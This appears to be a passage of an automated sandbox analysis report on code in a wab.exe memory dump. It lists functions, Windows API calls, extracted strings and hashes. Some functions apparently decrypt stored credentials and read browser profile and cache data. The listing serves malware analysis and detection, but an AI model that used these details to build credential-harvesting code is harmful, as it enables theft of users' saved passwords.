                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • memcpy.MSVCRT ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 2929817778-1134094380
                                                              • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • {Unknown}, xrefs: 004132A6
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT ref: 0040E3EC
                                                              • memcpy.MSVCRT ref: 0040E407
                                                              • memcpy.MSVCRT ref: 0040E422
                                                              • memcpy.MSVCRT ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3073804840-2252543386
                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
                                                              • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
